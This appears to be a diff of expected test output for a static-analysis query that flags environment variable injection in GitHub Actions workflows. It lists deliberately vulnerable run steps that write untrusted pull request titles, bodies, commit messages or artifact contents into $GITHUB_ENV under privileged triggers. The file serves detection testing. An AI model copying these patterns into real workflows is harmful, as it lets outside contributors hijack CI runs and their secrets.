| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test15.yml:18:14:20:48 | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | PR_BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})\necho "BODY=$PR_BODY" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | .github/workflows/test16.yml:4:3:4:14 | workflow_run | workflow_run | edges | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | 
@@ -92,40 +129,3 @@ nodes | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths -#select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
